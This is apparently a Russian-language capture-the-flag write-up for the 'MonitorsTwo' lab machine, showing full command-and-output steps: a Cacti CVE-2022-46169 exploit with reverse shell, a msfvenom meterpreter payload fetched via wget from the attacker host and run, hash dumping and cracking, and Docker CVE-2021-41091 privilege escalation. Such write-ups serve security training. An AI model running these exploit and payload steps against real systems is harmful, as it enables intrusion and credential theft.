Обзор сервисов
Посмотрим, какие сервисы есть на машине (10.10.11.211):
$ autorecon 10.10.11.211
[*] Scanning target 10.10.11.211
[!] [10.10.11.211/top-100-udp-ports] UDP scan requires AutoRecon be run with root privileges.
[*] [10.10.11.211/all-tcp-ports] Discovered open port tcp/80 on 10.10.11.211
[*] [10.10.11.211/all-tcp-ports] Discovered open port tcp/22 on 10.10.11.211
[*] [10.10.11.211/tcp/80/http/vhost-enum] The target was not a hostname, nor was a hostname provided as an option. Skipping virtual host enumeration.
[*] [10.10.11.211/tcp/80/http/known-security] [tcp/80/http/known-security] There did not appear to be a .well-known/security.txt file in the webroot (/).
[*] [10.10.11.211/tcp/80/http/curl-robots] [tcp/80/http/curl-robots] There did not appear to be a robots.txt file in the webroot (/).
На 80 порту обнаруживается Cacti.
Cacti
Версия 1.2.22 содержит уязвимость и публичный эксплоит:
$ git clone <https://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.22>
$ cd CVE-2022-46169-CACTI-1.2.22
$ nc -lnvp 443
$ python3 CVE-2022-46169.py --url=<http://10.10.11.211> --LHOST=10.10.14.175 --LPORT=443
Checking…
The target is vulnerable. Exploiting…
Bruteforcing the host_id and local_data_ids
Bruteforce Success!!
Перейдем на meterpreter:
## генерация
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.175 LPORT=80 -f elf -o shell
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
Saved as: shell
## слушатель
$ msfconole
## сервер
$ python3 -m http.server 444
Serving HTTP on 0.0.0.0 port 444 (<http://0.0.0.0:444/)> …
10.10.11.211 - - [23/Jun/2023 06:08:34] "GET /shell HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
## на атакуемой машине
www-data@50bca5e748b0:/$ cd tmp
www-data@50bca5e748b0:/tmp$ wget <http://10.10.14.175:444/shell>
--2023-06-23 10:08:36-- <http://10.10.14.175:444/shell>
Connecting to 10.10.14.175:444… connected.
HTTP request sent, awaiting response… 200 OK
Length: 250 [application/octet-stream]
Saving to: 'shell'
0K 100% 53.0M=0s
2023-06-23 10:08:36 (53.0 MB/s) - 'shell' saved [250/250]
www-data@50bca5e748b0:/tmp$ chmod +x shell
www-data@50bca5e748b0:/tmp$ ./shell
База данных
Секреты и точка подключения
Обнаружим креды для базы данных:
$ cd /
$ cat entrypoint.sh
#!/bin/bash
set -ex
wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
fi
chown www-data:www-data -R /var/www/html
## first arg is `-f` or `--some-option`
if [ "${1#-}" != "$1" ]; then
set -- apache2-foreground "$@"
fi
exec "$@"
root:root и точка подключения db (мы в docker контейнере).
Обзор базы данных
Посмотрим на доступные базы:
$ mysql -u root -p -h db -e "show databases;"
Enter password: root
Database
information_schema
cacti
mysql
performance_schema
sys
Посмотрим на все таблицы:
$ mysql -u root -p -h db cacti -e "show tables;"
Enter password: root
Tables_in_cacti
aggregate_graph_templates
aggregate_graph_templates_graph
aggregate_graph_templates_item
aggregate_graphs
aggregate_graphs_graph_item
aggregate_graphs_items
automation_devices
automation_graph_rule_items
automation_graph_rules
automation_ips
automation_match_rule_items
automation_networks
automation_processes
automation_snmp
automation_snmp_items
automation_templates
automation_tree_rule_items
automation_tree_rules
cdef
cdef_items
color_template_items
color_templates
colors
data_debug
data_input
data_input_data
data_input_fields
data_local
data_source_profiles
data_source_profiles_cf
data_source_profiles_rra
data_source_purge_action
data_source_purge_temp
data_source_stats_daily
data_source_stats_hourly
data_source_stats_hourly_cache
data_source_stats_hourly_last
data_source_stats_monthly
data_source_stats_weekly
data_source_stats_yearly
data_template
data_template_data
data_template_rrd
external_links
graph_local
graph_template_input
graph_template_input_defs
graph_templates
graph_templates_gprint
graph_templates_graph
graph_templates_item
graph_tree
graph_tree_items
host
host_graph
host_snmp_cache
host_snmp_query
host_template
host_template_graph
host_template_snmp_query
plugin_config
plugin_db_changes
plugin_hooks
plugin_realms
poller
poller_command
poller_data_template_field_mappings
poller_item
poller_output
poller_output_boost
poller_output_boost_local_data_ids
poller_output_boost_processes
poller_output_realtime
poller_reindex
poller_resource_cache
poller_time
processes
reports
reports_items
sessions
settings
settings_tree
settings_user
settings_user_group
sites
snmp_query
snmp_query_graph
snmp_query_graph_rrd
snmp_query_graph_rrd_sv
snmp_query_graph_sv
snmpagent_cache
snmpagent_cache_notifications
snmpagent_cache_textual_conventions
snmpagent_managers
snmpagent_managers_notifications
snmpagent_mibs
snmpagent_notifications_log
user_auth
user_auth_cache
user_auth_group
user_auth_group_members
user_auth_group_perms
user_auth_group_realm
user_auth_perms
user_auth_realm
user_domains
user_domains_ldap
user_log
vdef
vdef_items
version
Достанем хеши из таблицы user_auth:
$ mysql -u root -p -h db cacti -e "select * from user_auth;"
Enter password: root
id username password realm full_name email_address must_change_password password_changeshow_tree show_list show_preview graph_settings login_opts policy_graphs policy_trees policy_hosts policy_graph_templates enabled lastchange lastlogin password_history locked failed_attemptslastfail reset_perms
1 admin $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC 0 Jamie Thompson [email protected] on on on on on 2 1 1 1 1 on -1 -1 -1 0 0 663348655
3 guest 43e9a4ab75570f5b 0 Guest Account on on on on on 3 -1 -1 -1 0 0 0
4 marcus $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C 0 Marcus Brune [email protected] on on on on 1 1 1 1 1 on -1 -1 on 0 0 2135691668
Идентифицируем хеш и попробуем его подбирать по словарю:
$ hashid
$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C
Analyzing '$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C'
[+] Blowfish(OpenBSD)
[+] Woltlab Burning Board 4.x
[+] bcrypt
$ john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
funkymonkey (?)
Найденный пароль funkymonkey.
SSH
Используем найденный пароль для подключения к SSH:
$ ssh [email protected]
funkymonkey
Пользовательский флаг
marcus@monitorstwo:~$ id
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)
marcus@monitorstwo:~$ cat user.txt
e0a8dd2d31adad1fb1265dd72450995b
marcus@monitorstwo:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:7c:e0 brd ff:ff:ff:ff:ff:ff
inet 10.10.11.211/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:7ce0/64 scope global dynamic mngtmpaddr
valid_lft 86398sec preferred_lft 14398sec
inet6 fe80::250:56ff:feb9:7ce0/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:cc:41:77:20 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
4: br-60ea49c21773: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:97:eb:7b:89 brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-60ea49c21773
valid_lft forever preferred_lft forever
5: br-7c3b7c0d00b3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:30:9c:57:ce brd ff:ff:ff:ff:ff:ff
inet 172.19.0.1/16 brd 172.19.255.255 scope global br-7c3b7c0d00b3
valid_lft forever preferred_lft forever
inet6 fe80::42:30ff:fe9c:57ce/64 scope link
valid_lft forever preferred_lft forever
7: vethfe25ed3@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-7c3b7c0d00b3 state UP group default
link/ether 36:d4:63:7a:07:00 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::34d4:63ff:fe7a:700/64 scope link
valid_lft forever preferred_lft forever
9: vethb65e5d8@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-7c3b7c0d00b3 state UP group default
link/ether 2e:53:2f:fe:53:5a brd ff:ff:ff:ff:ff:ff link-netnsid 1
inet6 fe80::2c53:2fff:fefe:535a/64 scope link
valid_lft forever preferred_lft forever
Почта
При логине по SSH есть оповещение о письме для пользователя marcus, посмотрим на него:
marcus@monitorstwo:~$ cat /var/mail/marcus
From: [email protected]
To: [email protected]
Subject: Security Bulletin - Three Vulnerabilities to be Aware Of
Dear all,
We would like to bring to your attention three vulnerabilities that have been recently discovered and should be addressed as soon as possible.
CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.
CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.
CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.
We encourage you to take the necessary steps to address these vulnerabilities promptly to avoid any potential security breaches. If you have any questions or concerns, please do not hesitate to contact our IT department.
Best regards,
Administrator
CISO
Monitor Two
Security Team
Сообщение от CISO о том, что в системе обнаружены уязвимости.
Повышение привилегий
Попробуем воспользоваться CVE-2021-41091. Проверим, какая у нас версия Docker:
marcus@monitorstwo:~$ docker --version
Docker version 20.10.5+dfsg1, build 55c4c88
Версия подходит.
Чтобы воспользоваться готовым эксплоитом, нужно получить root пользователя в docker контейнере, для этого поищем в контейнере (первоначальном шелле meterpreter) бинарники с suid флагом:
$ find / -perm /4000
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/sbin/capsh
/bin/mount
/bin/umount
/bin/su
Нас интересует необычный файл /sbin/capsh, проверим на gtfobins:
/sbin/capsh --gid=0 --uid=0 --
Дадим файлу /bin/bash suid бит от пользователя root:
chmod u+s /bin/bash
Теперь мы можем воспользоваться CVE-2021-41091:
$ wget https://raw.githubusercontent.com/UncleJ4ck/CVE-2021-41091/main/exp.sh
## загрузить файл на машину и выполнить
marcus@monitorstwo:/tmp$ bash exp.sh
[!] Vulnerable to CVE-2021-41091
[!] Now connect to your Docker container that is accessible and obtain root access !
[>] After gaining root access execute this command (chmod u+s /bin/bash)
Did you correctly set the setuid bit on /bin/bash in the Docker container? (yes/no): yes
[!] Available Overlay2 Filesystems:
/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[!] Iterating over the available Overlay2 filesystems !
[?] Checking path: /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
[x] Could not get root access in '/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged'
[?] Checking path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[!] Rooted !
[>] Current Vulnerable Path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[?] If it didn't spawn a shell go to this path and execute './bin/bash -p'
[!] Spawning Shell
bash-5.1# exit
marcus@monitorstwo:/tmp$ ./bin/bash -p
-bash: ./bin/bash: No such file or directory
marcus@monitorstwo:/tmp$ /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bin/bash -p
bash-5.1# id
uid=1000(marcus) gid=1000(marcus) euid=0(root) groups=1000(marcus)
Флаг суперпользователя
bash-5.1# id
uid=1000(marcus) gid=1000(marcus) euid=0(root) groups=1000(marcus)
bash-5.1# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:7c:e0 brd ff:ff:ff:ff:ff:ff
inet 10.10.11.211/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:7ce0/64 scope global dynamic mngtmpaddr
valid_lft 86399sec preferred_lft 14399sec
inet6 fe80::250:56ff:feb9:7ce0/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:cc:41:77:20 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
4: br-60ea49c21773: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:97:eb:7b:89 brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-60ea49c21773
valid_lft forever preferred_lft forever
5: br-7c3b7c0d00b3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:30:9c:57:ce brd ff:ff:ff:ff:ff:ff
inet 172.19.0.1/16 brd 172.19.255.255 scope global br-7c3b7c0d00b3
valid_lft forever preferred_lft forever
inet6 fe80::42:30ff:fe9c:57ce/64 scope link
valid_lft forever preferred_lft forever
7: vethfe25ed3@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-7c3b7c0d00b3 state UP group default
link/ether 36:d4:63:7a:07:00 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::34d4:63ff:fe7a:700/64 scope link
valid_lft forever preferred_lft forever
9: vethb65e5d8@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-7c3b7c0d00b3 state UP group default
link/ether 2e:53:2f:fe:53:5a brd ff:ff:ff:ff:ff:ff link-netnsid 1
inet6 fe80::2c53:2fff:fefe:535a/64 scope link
valid_lft forever preferred_lft forever
bash-5.1# cat root.txt
4d12b504a9082ab093bdca77f0077453
